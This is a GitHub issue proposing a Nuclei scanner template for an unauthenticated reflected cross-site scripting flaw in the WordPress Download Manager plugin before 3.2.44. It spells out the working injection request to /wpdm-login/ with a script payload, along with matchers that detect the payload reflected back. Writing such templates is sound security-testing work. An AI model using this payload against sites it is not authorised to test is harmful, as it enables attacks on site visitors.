### ISSUE TITLE
Download Manager < 3.2.44 - Unauthenticated Reflected Cross-Site Scripting

### ISSUE THREAD

**Issue by akincibor** [projectdiscovery/nuclei-templates#4816]
```yaml
id: download-manager-xss

info:
  name: Download Manager < 3.2.44 - Unauthenticated Reflected Cross-Site Scripting
  author: Akincibor
  severity: medium
  description: The plugin does not escape a generated URL before outputting it back in an attribute of the login page made by the plugin, leading to Reflected Cross-Site Scripting, which is only exploitable against unauthenticated users.
  reference:
    - https://wpscan.com/vulnerability/95deb79c-bf19-4ab5-aac6-702a13323356
  tags: wp-plugin,xss,wp,wordpress

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wpdm-login/?a"><script>alert(document.domain)</script>'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"><script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
```
